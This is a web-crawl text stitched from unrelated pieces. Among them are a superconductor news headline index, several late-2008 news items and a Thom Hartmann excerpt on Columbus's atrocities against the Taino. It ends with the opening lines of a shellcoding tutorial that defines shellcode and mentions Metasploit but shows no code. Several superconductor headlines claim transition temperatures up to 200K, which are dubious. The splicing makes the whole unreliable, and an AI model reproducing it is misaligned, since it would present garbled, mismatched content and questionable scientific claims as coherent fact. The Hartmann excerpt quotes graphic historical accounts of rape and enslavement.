The First 200K Superconductor and a New Superconductor Family - 10/15/08
Interface Superconductivity : Synergy Between an Insulator and a Metal - 10/8/08
Prediction of Superconductivity in Transition Metal Chalcogenide Oxides - 9/28/08
A Quantum Traffic Jam in HT Superconductors - 8/27/08
A Theory to Explain Iron Pnictide Superconductivity - 8/13/08
195K : Milestone Superconductivity at Dry Ice Temperatures - 7/17/08
Y358 Ultra YBCO - Over 100K Without Extra Elements - 6/3/08
Pnictide Superconductivity over 50 K in a Non-Copper-oxide | Abstract , Full PDF - 5/20/08
Phonons Fail to Explain High - Temp Superconductivity - 4/23/08
Superconductor Antithesis : A Superinsulator - 4/2/08
185K : The First Ambient Temperature Superconductor | Antarctica is Cold Enough - 3/14/08
2007 :
175K Superconductivity Discovered - 10/3/07
Two New " Infinite Layer " Superconductors | A Challenge to YBCO - 8/31/07
A New High - Tc for Pb- based Superconductors .
- 7/26/07
Superconductor Makes Possible " Heat Transistor " - 07/13/07
The First High - Temperature Reentrant Superconductor ?
- 5/22/07
Lithium Superconducts at 0.4 mK | No Pressure Required - 05/10/07
A Solution to Building Non-Stoichiometric Structures : Make Them One Atom at a Time - 4/08/07
PWD 2 Years Later : 20 New Superconductors and Counting - 3/05/07
Strain - Dependent Jc Found in YBCO - 2/15/07
2006 :
Silicon Becomes A Superconductor | A Little Boron Does the Trick - 11/22/06
One - of - a- Kind " Resonant " Superconductor Discovered - 9/19/06
Superconducting Qubits May Enable Quantum Computing - 9/08/06
3rd Type of Planar Weight Disparity Found to Enhance Tc - 8/17/06
Boson - Mediated Electron Pairing Observed in HT Superconductors - 8/03/06
Superconductors to Facilitate World's First Artificial Sun - 7/24/06
Patent Claim Filed to Establish 150K High - Tc - 5/31/06
More Evidence to Support Stripes ' Contribution to HTSC - 04/26/06
A New Application for HTS Wire : Degaussing a Ship ! - 04/6/06
Nanodots Boost Supercurrent - 04/3/06
Gravity Effect in Rotating Superconductors Confirmed - 03/26/06
Multi-walled Carbon Nanotubes Superconduct at 12 K - 02/14/06
Another Superconductor Responds to Planar Weight Tilting - 1/7/06
2005 :
Negative - Refractive - Index Material Made From Superconductors - 12/20/05
A Pseudogap Puzzle for Superconductors - 11/23/05
BCS Theory Co-Developer , John Schrieffer , Sentenced to Prison - 11/09/05
" Super " YBCO Created | A Market Challenger to Lucent - 11/8/05
A New Intercalated Low - temp Superconductor - 08/30/05
Confirmation : Planar Weight Disparity Can Increase Tc in the Copper - Oxides - 08/16/05
A New Method of Separating Superconductors from a Mix - 06/25/05
DNA Nanowires Exhibit SQUID - like Behavior | PhysicsWeb - 05/17/05
Superconductivity via Protons ? | New Scientist - 05/07/05
Superconductor Makes Nano-Refrigerator Possible - 04/28/05
High Tc , Low Toxicity : 115K Superconductivity in Sn-3212 - Tm - 03/05/05
2004 :
Layering - Dependent Superconductivity | with Tc Oscillations - 12/09/04
A New Form of Superconductivity : Odd Parity - 11/11/04
Giant Proximity Effect | Theory Becomes Fact - 10/19/04
Superconducting Generator Powers Microwave Weapon | AP - 10/04/04
BaZr Increases YBCO Current Density | UC / CAM / LANL - 9/9/04
First All Metal Perovskite Superconductor Gets Wired | APS - 8/25/04
Oxygen Isotope Helps Confirm Phonon HTSC Role | UC Berkeley - 8/16/04
Superconductivity Seems to Follow Scaling Relation Law | BNL - 7/30/04
China 's First Superconductor Power Grid Becomes Operational - 7/15/04
New Clues Toward an HTSC Theory | Collective Magnetic Excitation - 6/03/04
Strong Evidence of Superconductivity in SWNT Ropes - 5/19/04
Russians Report Superconducting Diamond | Physics Web - 3/31/04
A Quantum Improvement in MRI Sensitivity | Berkeley Labs - 3/15/04
A Theory for Superconductivity in the Oxo-Cuprates | " Magnetic - Pairing " - 2/19/04
2003 :
" Hi - Tc Update " Stops Publishing After 16 Years | Funds Finally Run Out - 12/31/03
Fluoroargenate Superconductivity | Is This It ? - 12/17/03
Another Superconductor with a Pyrochlore Structure - Physics Web - 12/16/03
Superconducting Aluminum Spots Single Photons of Light - Physics Web - 10/22/03
2003 Nobel Prize in Physics Awarded for Superconductor and Superfluid Theory - 10/07/03
The Case for RTSC in Carbon Nanotubes | 20 Markers and Counting - REVISED 12/17/04
Phosphorus Challenges Lithium for Type 1 High - Tc - BCC is Better - 9/04/03
LiBC Does n't Live Up to Expectations ( PDF File ) - But CuB 2-x C x Might ! - 7/03
Digital Switching with Vortices | The " Logic " Inherent in Superconductors - 6/20/03
MgB 2 Theory Confirmed | Is Commercial Viability Approaching ?
- UPDATED 6/07/03
No Mixing of Superconductivity and Antiferromagnetism | Nature - 4/23/03
New Superconductor Property Confirmed | A Slick Discovery - UPDATED
4/08/03
Superconductors to Sustain Internet Growth ? |
The Need for Speed - REV .
4/03
FFLO Superconductivity Found in CeCoIn5 | The Rarest of the Rare - 4/03
A Superconducting E-bomb | The U.S. Military Uses It On Iraq - UPDATED 3/25/03
Layered Superconductor Contains Water Molecules - 3/6/03
A Superconducting Bloch Oscillating Transistor | Are Quantum Computers Next ? - 2/18/03
2002 :
A Transuranic Superconductor | With a Surprisingly High Tc ! - 11/20/02
A.A.A.S. Pulls 8 Papers | Schon's Co-Authors React - 10/31/02
Osaka University Finds SC in Lithium | 20 K at 48 GPa - 10/10/02
Theory Explains Superconductivity in MgB 2 | It 's Not Just Another Alloy - 8/02
Virginia to Get US ' First Maglev | " Floating " a New Idea - 6/02
Inverse Proximity Effect Boosts Tc | Set Out the Good Silver ! - 5/06/02
Magnetic Resonance Takes the Lead by a Nose | It 's a Horserace ! - 1/24/02
HTS Phonon Influence Confirmed |
The " Kink " Tells the Tale - 1/14/02
Scientists Develop Superconducting Camera | Smile !
You 're on " S - Cam " - 1/13/02
2001 :
A Theoretical Setback | Electrons Are Fickle in ( Pr , Ce ) 2 CuO 4 - 12/12/01
Gold - based High - Tc Oxocuprates | A Tc near 99 K - 8/30/01
A Superconducting Gravity Generator ?
| Podkletnov's Follow - Up Discovery - 8/10/01
The Iron Age of Superconductivity | A Tc of 2 K at 20 GPa - 7/19/01
Boron Yields to Pressure | Unusual Metallic Behavior - 7/12/01
Zero Resistance without Cooper- pairing | Ballistic Quantum Wire - 5/01
A 15 K Nanotube | Carbon Superconducts in a ROUNDabout Way - 4/7/01
Superconductive DNA |
It 's in the Genes - 1/01
2000 :
A 91K Tungsten - Bronze | The First Non-Cuprate HTS - REV .
10/00
Superconductors Achieve Major " Gains " | The First Superconductor Amplifier - 7/00
A 58 K Magnet - Superconductor | The Impossible Realized - REV .
4/00
1997 -1999 :
Magnetism-vs-Superconductivity | Friends After All ? - 4/99
Superconductors
See the Light | The Most Sensitive Light Detector Ever - 1/99
200 K for a Bismuth Compound ? | Doubling Tc 's with Molecular Strain - 7/98
Oxygen and Sulfur join the Type 1's | Performing Under Pressure - 98/97
Physics.ORG
Superconductivity News
IOP Physics World
Superconductivity News
Journal of Superconductivity & Novel Magnetism
Fast - tracking Superconductor News
Superconductor Science and Technology
A Forum for Workers in the Field of Superconductivity
Carmen Electra in Playboy 's 55th Anniversary Issue
It has been thirteen years since gorgeoushas graced the pages of Playboy magazine .
But that is about to change because Carmen has been tapped to pose for Playboy in their upcoming 55th Anniversary issue .
Electra is engaged to rocker Rob Patterson from the band Korn .
The two have both stressed that they are in no rush to walk down the aisle .
This would be the third marriage for Carmen who was previously hitched to both Dennis Rodman and Dave Navarro .
The first chance to see the January issue of Playboy will be on December 12th when it hits newsstands .
The 36 year old will be featured in an 8 page pictorial .
Arizona Gov. Janet Napolitano has been chosen to be secretary of the vast and troubled Department of Homeland Security .
Arizonan will head Homeland Security
Arizona Demcratic Gov. Janet Napolitano has been chosen to serve as secretary of the vast and troubled Department of Homeland Security for President - elect Barack Obama , Democratic officials said .
Napolitano is a border governor who will now be responsible for immigration policy and border security , which are part of Homeland Security ’s myriad functions .
Napolitano brings law and order experience from her stint as the Grand Canyon State ’s first female attorney general .
One of the nation ’s most prominent female elected officials , she made frequent appearances on behalf of Barack Obama during the campaign .
She was reelected to a second four - year term in 2006 .
Advertisement
Transition insiders have long expected that she would be offered a Cabinet slot , although she had also been mentioned for other posts , including attorney general .
Napolitano , 50 , endorsed Obama in early January , just as the primaries were kicking off , and the female up - and - comer 's decision to back the Illinois senator got widespread coverage .
In 2005 , Time magazine named her one of America ’s five best governors , calling her “ A Mountaineer on the Political Rise . ”
Time wrote : “ The one issue Republicans think they can use against the popular Napolitano is illegal immigration , because the huge number of border crossings have left many Arizonans feeling overwhelmed and powerless .
Her critics claim she came to the problem late , but she seems to have navigated it deftly .
… Napolitano opposed … several bills that targeted illegal immigrants .
Instead , she looked to the systems and people that make illegal immigration possible :
She ordered state contractors to ensure that their employees are legal [ and ] set up an undercover unit to catch forgers of identity documents …
In mid-August she declared a state of emergency in Arizona to direct more funds to protecting border areas from illegal crossings . ”
The Democratic officials said Napolitano has not been officially offered the job but is likely to be named and to accept .
The selection was first reported by CNN .
Her official bio says : “ Janet Napolitano was sworn in as Arizona ’s 21st governor on January 6 , 2003 .
She is the first woman in the nation ’s history to serve as U.S. Attorney , State Attorney General and Governor in immediate succession .
Prior her election as Governor of Arizona , Napolitano served one term as Arizona Attorney General and four years as U.S. Attorney for the District of Arizona .
Born in New York City and raised in Albuquerque , New Mexico , she is a distinguished alumna of Santa Clara University and the University of Virginia Law School .
She has lived in Arizona since 1983 , when she moved to Phoenix to practice law . ”
Men and women who have heart transplants ' more likely to die if donor is opposite sex '
Revealed : Patients who have a heart transplant are 15 per cent more likely to die if the donor is of the opposite sex ( posed by models )
Heart transplant patients are more likely to die if the donor is of the opposite sex , researchers claim .
This could be because of size differences - men ’s hearts tend to be larger - or hormonal factors .
Patients who received a heart transplant from a donor of the opposite sex had a 15 per cent higher risk of death than those whose donor was the same sex , researchers from Johns Hopkins University in Baltimore , in the U.S. , found .
The lowest survival rate was in men who had a donor heart from a woman , they told the American Heart Association .
Men given a heart from a female donor were more likely to experience organ rejection .
Women getting a male donor heart were no more likely to reject the organ than if it came from another woman .
The five - year survival rate is 72 per cent for men and 68 per cent for women .
The findings were based on 18,240 patients who had a heart transplant from 1998 to 2007 .
If a same - sex heart is not available , patients should still have a transplant rather than waiting for a better match , it was suggested .
‘ The rate of survival is clearly superior having a transplant to not having a transplant , ’ said Dr Eric Weiss .
AFP
Correction to this article
FOR those who think a new cold war has broken out , this week seemed to provide some evidence .
The Peter the Great , a nuclear - powered cruiser , and two other Russian warships , arrived in the Caribbean to exercise with the Venezuelan navy .
Onshore , Russia 's president , Dmitry Medvedev , met Venezuela 's Hugo Chávez as part of a Latin American tour .
In Peru , he attended the APEC summit , a get - together of leaders from 21 Asian and Pacific countries .
Like Mr Medvedev , China 's Hu Jintao ( pictured with Peru's president , Alan García ) also used the Lima meeting as a pretext for a Latin American tour , which in his case took in Costa Rica and Cuba .
Last year another visitor from far - flung parts , Iran 's Mahmoud Ahmadinejad , turned up in Latin America .
To some in the United States , this flurry of outside interest in a region that they considered their “ backyard ” is threatening .
They see it is a sign that under President George Bush America has lost influence in the region .
In fact , Latin America 's international ties have long been more diverse than caricature allows , but they are becoming even more so as the world changes .
For some South American countries , Europe has always been at least as important as a trade and investment partner as the United States .
Trade with Japan and the Middle East grew in the 1970s , while the Soviet Union sold arms to Peru as well as sustaining communist Cuba .
It is Mr Chávez 's search for allies in his rhetorical and political battle against the “ empire ” , as he likes to call the United States , that pricked the interest of Russia and Iran .
For Russia , its Caribbean naval jaunt is a symbolic riposte to America 's plan to place missile batteries in Poland and to its dispatch of naval vessels to distribute aid in Georgia after Russia 's incursion in August .
The same goes for its recent revival of ties with Cuba .
But Mr Medvedev 's main purpose in Latin America is business .
Mr Chávez has already bought arms worth $ 4.4 billion from Russia — including a Kalashnikov factory due to start producing 50,000 rifles a year in 2010 .
Russia was reported this month to have signed a contract to sell Venezuela portable air - defence missiles .
That would alarm Colombian officials , who will fear their onward unofficial sale to the FARC guerrillas .
Russian oil , gas and mining companies have signed deals to invest in Venezuela .
Mr Chávez would like the Russians to build a nuclear power station .
Mr Medvedev arrived in Caracas from Rio de Janeiro .
Brazil is close to signing an arms deal with France , which has agreed to pass on jet - fighter technology .
But it may buy Russian helicopters , and sees scope for collaboration with Russia on civilian nuclear technology and aerospace .
Mr Medvedev said in Rio de Janeiro that he hoped trade between the two countries would soon double from last year 's $ 5 billion .
Russian companies are interested in extracting Brazilian oil too .
After initially embracing Mr Chávez as an ally , Brazil 's government has recently sought quietly to neutralise his influence .
By inviting Mr Medvedev Brazil 's message to Russia is : “ if you want to have a significant relationship in South America , have it with us , ” says Paulo Sotero , a Brazil specialist at the Woodrow Wilson Center , a think - tank in Washington , DC .
The motive for Iran 's recent interest in Latin America seems to be a desire to add to its small stock of diplomatic friends around the world , and to score propaganda points against the United States .
Mr Chávez has signed no fewer than 200 co-operation agreements with Iran .
Venezuelan officials say that Iran has invested more than $ 7 billion in their country — in plants to assemble cars , tractors , farm machinery and bicycles , as well as oil — and that bilateral trade has reached $ 4.6 billion .
But these figures may be exaggerated .
Last year Ultimas Noticias , a pro-government newspaper , reported big delays on some Iranian investments and rake - offs by local officials involved in them .
In Mr Chávez 's wake , socialist presidents in Bolivia , Ecuador and Nicaragua have also developed ties with Iran .
Mr Ahmadinejad promised investments of $ 1.1 billion in developing Bolivia 's gas , and $ 350 m to build a port in Nicaragua .
But there is little sign of either investment materialising .
Brazil 's foreign minister , Celso Amorim , recently visited Tehran and delivered a letter from President Luiz Inácio Lula da Silva inviting Mr Ahmadinejad to visit .
Since Iran is the subject of United Nations sanctions , and Brazil has been actively , if fruitlessly , pursuing a permanent seat at the UN , this raised eyebrows in Brazil .
Mr Amorim 's visit was “ inexplicable ” and “ gratuitous ” , according to Luiz Felipe Lampreia , a former foreign minister .
The intercontinental ambitions of Iran , Russia and Venezuela have all been puffed up by oil , and so are vulnerable to the steep fall in its price .
The lasting change for Latin America is its burgeoning ties with China .
At the APEC summit , Mr Bush 's last trip abroad , it was Mr Hu who was the centre of attention .
Mr García treated him to a parade around Lima 's colonial centre before they announced that they had wrapped up a free - trade agreement between their two countries .
That matches a similar accord China concluded with Chile in 2005 .
China 's total two - way trade with Latin America has shot up from just $ 12.2 billion in 2000 to $ 102 billion last year .
Though Chinese investment — mainly in mining and oil — has grown more slowly , it is now picking up .
Last month China became a member of the Inter - American Development Bank .
But China has also disappointed some Latin Americans .
Some Brazilians complain that Brazil sells raw materials to China while buying manufactures from it .
Brazil is frustrated that neither China nor Russia has helped its Security Council bid .
All Latin American countries are naturally keen to diversify their economic relations , and some seek wider political ties .
But Europe ( $ 250 billion last year ) and the United States ( $ 560 billion ) remain Latin America 's biggest trade partners .
And the foreign leader that most Latin American politicians will be keenest to see over the coming year is Barack Obama .
Correction : we wrote that Mr Medvedev came to Caracas from Brasília , when he in fact came from Rio de Janeiro .
This was corrected on December 4th 2008 .
" Gold is most excellent ; gold constitutes treasure ; and he who has it does all he wants in the world , and can even lift souls up to Paradise . "
-- Christopher Columbus , 1503 letter to the king and queen of Spain .
" Christopher Columbus not only opened the door to a New World , but also set an example for us all by showing what monumental feats can be accomplished through perseverance and faith . "
-- George H.W. Bush , 1989 speech
If you fly over the country of Haiti on the island of Hispaniola , the island on which Columbus landed , it looks like somebody took a blowtorch and burned away anything green .
Even the ocean around the port capital of Port au Prince is choked for miles with the brown of human sewage and eroded topsoil .
From the air , it looks like a lava flow spilling out into the sea .
The history of this small island is , in many ways , a microcosm for what 's happening in the whole world .
When Columbus first landed on Hispaniola in 1492 , virtually the entire island was covered by lush forest .
The Taino " Indians " who loved there had an apparently idyllic life prior to Columbus , from the reports left to us by literate members of Columbus 's crew such as Miguel Cuneo .
When Columbus and his crew arrived on their second visit to Hispaniola , however , they took captive about two thousand local villagers who had come out to greet them .
Cuneo wrote : " When our caravels ... where to leave for Spain , we gathered ... one thousand six hundred male and female persons of those Indians , and these we embarked in our caravels on February 17 , 1495 ... For those who remained , we let it be known ( to the Spaniards who manned the island 's fort ) in the vicinity that anyone who wanted to take some of them could do so , to the amount desired , which was done . "
Cuneo further notes that he himself took a beautiful teenage Carib girl as his personal slave , a gift from Columbus himself , but that when he attempted to have sex with her , she " resisted with all her strength . "
So , in his own words , he " thrashed her mercilessly and raped her . "
While Columbus once referred to the Taino Indians as cannibals , a story made up by Columbus - which is to this day still taught in some US schools - to help justify his slaughter and enslavement of these people .
He wrote to the Spanish monarchs in 1493 : " It is possible , with the name of the Holy Trinity , to sell all the slaves which it is possible to sell ...
Here there are so many of these slaves , and also brazilwood , that although they are living things they are as good as gold ... "
Columbus and his men also used the Taino as sex slaves : it was a common reward for Columbus ' men for him to present them with local women to rape .
As he began exporting Taino as slaves to other parts of the world , the sex - slave trade became an important part of the business , as Columbus wrote to a friend in 1500 : " A hundred castellanoes ( a Spanish coin ) are as easily obtained for a woman as for a farm , and it is very general and there are plenty of dealers who go about looking for girls ; those from nine to ten ( years old ) are now in demand . "
However , the Taino turned out not to be particularly good workers in the plantations that the Spaniards and later the French established on
Hispaniola : they resented their lands and children being taken , and attempted to fight back against the invaders .
Since the Taino where obviously standing in the way of Spain 's progress , Columbus sought to impose discipline on them .
For even a minor offense , an Indian 's nose or ear was cut off , se he could go back to his village to impress the people with the brutality the Spanish were capable of .
Columbus attacked them with dogs , skewered them with pikes , and shot them .
Eventually , life for the Taino became so unbearable that , as Pedro de Cordoba wrote to King Ferdinand in a 1517 letter , " As a result of the sufferings and hard labor they endured , the Indians choose and have chosen suicide .
Occasionally a hundred have committed mass suicide .
The women , exhausted by labor , have shunned conception and childbirth ...
Many , when pregnant , have taken something to abort and have aborted .
Others after delivery have killed their children with their own hands , so as not to leave them in such oppressive slavery . "
SCROLL TO CONTINUE WITH CONTENT Never Miss a Beat .
Get our best delivered to your inbox .
Eventually , Columbus and later his brother Bartholomew Columbus who he left in charge of the island , simply resorted to wiping out the Taino altogether .
Prior to Columbus ' arrival , some scholars place the population of Haiti / Hispaniola ( now at 16 million ) at around 1.5 to 3 million people .
By 1496 , it was down to 1.1 million , according to a census done by Bartholomew Columbus .
By 1516 , the indigenous population was 12,000 , and according to Las Casas ( who were there ) by 1542 fewer than 200 natives were alive .
By 1555 , every single one was dead .
This was n't just the story of Hispaniola ; the same has been done to indigenous peoples worldwide .
Slavery , apartheid , and the entire concept of conservative Darwinian Economics , have been used to justify continued suffering by masses of human beings .
Dr. Jack Forbes , Professor of Native American Studies at the University of California at Davis and author of the brilliant book " Columbus and Other Cannibals , " uses the Native American word wétiko ( pronounced WET - ee - ko ) to describe the collection of beliefs that would produce behavior like that of Columbus .
Wétiko literally means " cannibal , " and Forbes uses it quite intentionally to describe these standards of culture : we " eat " ( consume ) other humans by destroying them , destroying their lands , taking their natural resources , and consuming their life - force by enslaving them either physically or economically .
The story of Columbus and the Taino is just one example .
We live in a culture that includes the principle that if somebody else has something we need , and they wo n't give it to us , and we have the means to kill them to get it , it 's not unreasonable to go get it , using whatever force we need to .
In the United States , the first " Indian war " in New England was the " Pequot War of 1636 , " in which colonists surrounded the largest of the Pequot villages , set it afire as the sun began to rise , and then performed their duty : they shot everybody - men , women , children , and the elderly - who tried to escape .
As Puritan colonist William Bradford described the scene : " It was a fearful sight to see them thus frying in the fire and the streams of blood quenching the same , and horrible was the stink and scent thereof ; but the victory seemed a sweet sacrifice , and they [ the colonists ] gave praise therof to God , who had wrought so wonderfully ... "
The Narragansetts , up to that point " friends " of the colonists , were so shocked by this example of European - style warfare that they refused further alliances with the whites .
Captain John Underhill ridiculed the Narragansetts for their unwillingness to engage in genocide , saying Narragansett wars with other tribes were " more for pastime , than to conquer and subdue enemies . "
In that , Underhill was correct : the Narragansett form of war , like that of most indigenous Older Culture peoples , and almost all Native American tribes , does not have extermination of the opponent as a goal .
After all , neighbors are necessary to trade with , to maintain a strong gene pool through intermarriage , and to insure cultural diversity .
Most tribes would n't even want the lands of others , because they would have concerns about violating or entering the sacred or spirit - filled areas of the other tribes .
Even the killing of " enemies " is not most often the goal of tribal " wars " :
It 's most often to fight to some pre-determined measure of " victory " such as seizing a staff , crossing a particular line , or the first wounding or surrender of the opponent .
This wétiko type of theft and warfare is practiced daily by farmers and ranchers worldwide against wolves , coyotes , insects , animals and trees of the rainforest ; and against indigenous tribes living in the jungles and rainforests .
It is our way of life .
It comes out of our foundational cultural notions .
So it should not surprise us that with the doubling of the world 's population over the past 37 years has come an explosion of violence and brutality , and as the United States runs low on oil , we are now fighting wars in oil - rich parts of the world .
That is , after all , our history , which we celebrate on Columbus Day .
It need not be our future .
Excerpted and slightly edited from " The Last Hours of Ancient Sunlight : The Fate of the World and What We Can Do Before It 's Too Late " by Thom Hartmann .
www.thomhartmann.com
British officials last night played down the possibility that Britons were involved in the attacks on Mumbai .
India 's first minister was reported to have claimed that two of the arrested gunmen were British - born Pakistanis , and UK authorities quickly said they were investigating the reports .
But the Foreign Office later said that the deputy high commissioner in Mumbai had talked to Indian authorities , who said there was no evidence that any of the terrorists , shot or detained , were British .
A spokesman said : " We have spoken to Indian authorities at a high level , and they have said that there is no evidence that any of the terrorists either captured or dead are British . "
He added that the Indian chief minister had " said no such thing privately or publicly " , despite reports to the contrary .
Intelligence sources also said that they had seen nothing to suggest that the claim , attributed to the chief minister Vilasrao Deshmukh , was correct .
Last night reports in Britain claimed that security forces in India had found BlackBerry handheld devices which allowed the terrorists to monitor international news websites .
An officer from the Indian special forces units who were in action during a siege of Mumbai's Jewish centre had reportedly said that the devices had contained " content from the English media " .
Elsewhere , reports suggested that up to seven of the attackers could have been British and that they had links with Yorkshire .
However , speculation linking the attackers with Bradford , West Yorkshire , was rejected by the Leeds - based Counter Terrorism Unit .
A statement from sources in the force said : " At this stage we are not in receipt of any intelligence or information linking the events in India to our area . "
The Times reported last night that it had been told by Patrick Mercer MP , a former Tory security spokesman , that he had been given information that at least two of the terrorists had credit cards and other identifying documents which linked them to Dewsbury , West Yorkshire .
He also said he had been told that the terrorists arrived with only basic communications - but had then seized mobile phones and BlackBerry devices from their hostages and used them to contact each other and to monitor world reaction .
Earlier in the day the home secretary , Jacqui Smith told reporters : " I think it 's important that we make judgments on this on the basis of actually the fullest possible knowledge and intelligence , and that 's obviously what we are working on at the moment . "
British authorities had " no knowledge " of anyone with a UK passport being among the gunmen who had been either killed or captured , she added .
Gordon Brown also warned against jumping to conclusions .
Following a phone conversation with his Indian counterpart , Manmohan Singh , the prime minister said : " At no point has the prime minister of India suggested to me that there is evidence at this stage of any terrorist of British origins , but obviously these are huge investigations that are being done and I think it will be premature to draw any conclusions at all .
" We remain steadfast and firm , standing with India and all other countries against any form of terrorist activity , and we will be vigilant in both helping the Indian authorities and in making sure that in every part of the world we support those who are fighting terrorism . "
British anti-terrorist officers are liaising with their Indian counterparts , and officers are now in Mumbai .
They are understood to include include terrorism experts and family liaison officers .
Officers are also meeting Britons returning on flights to London 's Heathrow Airport and handing out leaflets appealing for information .
A German MEP caught up in the attacks said she had heard that British nationals were among the terrorists involved in the killings in Mumbai .
Erika Mann , part of a trade delegation of MEPs from Brussels staying at the Taj hotel , said she had escaped through an underground passage .
She said : " The attacks appear to have a European dimension .
We have heard from journalists and other people we were with that English citizens took part in the attacks and were killed in the hotel . "
In Issue # 206 of Custom PC , we show you how to take the shrink ray to your massive desktop tower PC without sacrificing performance .
We take you through the case and component options , as well as cooling considerations and hardware tips .
There ’s also a mini-ITX motherboard labs test .
Joe Biden on Drugs Democratic Sr Senator ( DE ) ; Vice President - Elect
Took lead on drug policy & narcotics control
Source : The Contenders , by Laura Flanders , p.180 Nov 11 , 2007
National ban on smoking would reduce chronic illnesses
BIDEN : Yes .
I would ban -- in all public [ places ] , nationally .
DODD : 3,000 kids start smoking every day in this country .
RICHARDSON : I did it in New Mexico as a national law .
KUCINICH :
You bet I ’ll go for a national law .
Q : So Biden , Dodd , Richardson , Gravel and Kucinich in favor of a national law .
EDWARDS : Wait , wait , wait , and Edwards .
BIDEN : Let me also add here as well -- with 3,000 young people starting to smoke every single day , one of the major causes of the health care issue and Medicare -- is because of chronic illnesses associated with things like smoking .
So the idea that we would n’t draft a national law to stop this in public places is one of the things you ’re going to have to do if you ’re going to deal with rising health care costs and the same is true with alcohol .
Source : 2007 Democratic primary debate at Dartmouth College Sep 6 , 2007
Absolutely do not lower drinking age from 21
BIDEN : Absolutely no , I would not .
The cost of alcoholism in America , the cost of accidents that flow from drunkenness , are astronomical .
This is a gigantic problem , just like the drug issue .
And the idea that we ’re going to suggest that it makes good sense to move the age down to 18 I find to be counterproductive I would not do that .
DODD : No , I agree with Joe on this .
The problems associated with alcohol are significant in our country .
The evidence is overwhelming .
GRAVEL : I think we should lower it .
Anybody that can go fight and die for this country should be able to drink .
KUCINICH :
Of course they should be able to drink at age 18 , and they should be able to vote at age 16 .
Q : No on 18 ?
OBAMA : No .
EDWARDS : What was the question ?
Q : Lower the drinking age to 18 ?
EDWARDS : I would not .
Source : 2007 Democratic primary debate at Dartmouth College Sep 6 , 2007
FactCheck : 40,000 babies with alcohol syndrome , not 300,000
Source : FactCheck.org on 2007 Democratic primary debate at Dartmouth Sep 6 , 2007
Increase penalties for dealing drugs near schools
The Biden Crime Law : Joe Biden wrote the legislation that put 100,000 cops on the streets , and built drug courts to improve rehabilitation treatment for non-violent offenders .
Source : Campaign website , www.joebiden.com, “ Issues ” Sep 1 , 2007
Most violent crime is related to drugs
Secondly , what we do is we also have a notion here where instead of putting them through this process , we should put them through the drug courts .
I ’m the guy that authored that drug court policy .
We should divert them into treatment .
You want to stop death in your neighborhood , take drugs of the corner .
You want to take drugs off the corner , take them out of the prison system and put them into treatment .
Source : 2007 NAACP Presidential Primary Forum Jul 12 , 2007
Divert drug offenders out of prison system
The bulk of sentencing inequity is at the state level , not at the federal level .
We need diversion out of the system .
I ’m the guy that wrote the drug court legislation that is in the law right now .
You have to eliminate the disparity between crack & powdered cocaine .
I ’ve introduced legislation to do that .
You have to find a way in which you insist that the states apply the law equally -- they do n’t .
300,000 will come out addicted from the prison this year
Source : 2007 Democratic Primary Debate at Howard University Jun 28 , 2007
Created nation ’s Drug Czar Office & drug courts
Source : PAC website , www.UniteOurStates.com
Dec 12 , 2006
Voted NO on increasing penalties for drug offenses .
Reference : Bill S.625 ; vote number 1999 - 360 on Nov 10 , 1999
Voted YES on spending international development funds on drug control .
Reference : Bill HR 3540 ; vote number 1996 - 244 on Jul 25 , 1996
Rename " Drug Abuse " institute as " Diseases of Addiction " .
A bill to change the name of the National Institute on Drug Abuse to the National Institute on Diseases of Addiction ; and to change the name of the National Institute on Alcohol Abuse and Alcoholism to the National Institute on Alcohol Disorders and Health .
Congress makes the following findings :
It 's not preferable , but all major U.S. financial companies will eventually be under government control because the alternative is so much worse , Hugh Hendry , chief investment officer at hedge fund Eclectica Asset Management , said Friday .
" All financials will be owned by the U.S. government in a year , " Hendry said .
" I bet you . "
Nationalizations take dramatic losses from the private sector and places them on the larger balance sheet of the public sector , he said .
" It 's not good , " but society is vulnerable and society is going to have to intervene , Hendry said .
The European Commission issued its Strategic Energy Review yesterday , proposing energy efficiency investments , a shift to alternative fuel vehicles to end oil dependence in transport , and more aggressive deployment of renewable energy and carbon capture and storage to “ decarbonise ” the EU electricity supply .
Figuring prominantly among its first six “ priorities essential for the EU ’s energy security ” are the North Sea offshore electric power supergrid that Energywise covered in September and the Mediterranean Ring electric interconnection of Europe and North Africa that I ’ve been harping on this week .
The EC energy strategy not only endorses the MedRing , but views it as a component of a future supergrid traversing Europe and stretching beyond the Mediterranean to Iraq , the Middle East and Sub - Saharan Africa .
How would this new vision ( and $ 100 / barrel oil ) alter the complexion of European energy consumption ?
The energy review projects that by 2020 total energy demand drops from the equivalent of 1811 metric tons of oil in 2005 to 1672 MTOE in 2020 .
Demand met by renewables such as wind , solar and hydro more than doubles in real terms from 123 to 274 MTOE , while their share of total demand leaps from 6.8 % to 16.4 % .
Imported renewables – with the MedRing delivering North African wind and solar power – jump 10 - fold from 0.8 % in 2005 to 8.8 % in 2020 .
Oil , gas , coal and nuclear , meanwhile , all see a diminished role , both in real terms and as a share of European energy demand .
Interestingly the role of natural gas – the low - carbon fossil fuel – drops the most , from 25 % to 21 % , reflecting EU concern over dependence on gas imports from Russia .
Nuclear ’s share drops the least , from just slightly over to slightly under 14 % of demand ; this assumes that nuclear phaseout plans , particularly Germany ’s , are followed through .
How to make it all come true ?
Accompanying the EC review is a ‘ green paper ‘ ( the EU ’s unbleached alternative terminology for what we ’d call a ‘ white paper ’ ) outlining a variety of new regulatory and financial mechanisms .
The EU is already a world leader in terms of incentives for lower carbon energy with strong price supports for solar and wind and a carbon cap and trade program up and running ( though still lacking teeth as my Energywise colleague Bill Sweet notes ) .
However , the energy review warns that the primarily national - level financing that drives energy projects today are inadequate to drive infrastructure that is pan-European or larger .
A perfect example is the massive investment in high - voltage dc lines needed to turn the MedRing into a bulk power mover ( see the second half of our feature on MedRing : “ Closing the Circuit ” ) .
Even less viable under existing financing mechanisms are those projects that entail considerable “ non-commercial risks ” such as threats of political instability or terrorism .
Did someone say North Africa ?
: : : : : : : : : :
This post was created for Energywise , IEEE Spectrum ’s blog on green power , cars and climate
Shellcoding for Linux and Windows Tutorial with example windows and linux shellcode by steve hanna
http://www.vividmachines.com/
steve./c/.hanna@gmail/.com
for premier computer security research check out : http://www.sigmil.org/
Table of Contents
1. Created - July 2004
2. Advanced Shellcoding Methods Section Added - Sept 2005
3. Updated Faq regarding stack randomization .
- June 2007
1 . What is shellcoding ?
In computer security , shellcoding in its most literal sense , means writing code that will return a remote shell when executed .
The meaning of shellcode has evolved , it now represents any byte code that will be inserted into an exploit to accomplish a desired task .
2 . There are tons of shellcode repositories all around the internet , why should I write my own ?
Yes , you are correct , there are tons of repositories all around the internet for shellcoding .
Namely , the metasploit project seems to be the best .
